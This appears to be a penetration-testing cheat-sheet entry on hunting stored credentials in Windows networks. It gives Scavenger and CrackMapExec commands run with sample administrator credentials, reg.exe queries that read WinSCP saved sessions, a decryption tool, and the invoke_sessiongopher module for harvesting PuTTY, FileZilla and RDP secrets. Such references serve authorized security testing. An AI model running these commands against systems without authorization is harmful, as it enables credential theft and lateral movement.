# Scavenger is a tool used above CrackMapExec to automate the process# of looking for sensitive files and informations during Internal Pentest
python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local
$ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite
WinSCP
# WinSCP is potentially exploitable in the registry if not using a master password# You can manually request the key
reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2"
reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2\Sessions\username@ip"# Then let's recover the password using the following binary
https://github.com/anoopengineer/winscppasswd/releases
.\winscppasswd ip user
# Automatisation using CrackMapExec# Using invoke_sessiongopher you can recover informations about PuTTY, WinSCP, FileZilla, SuperPuTTY or RDP
crackmapexec smb ip -u "user" -p "password" -d "domain" -M invoke_sessiongopher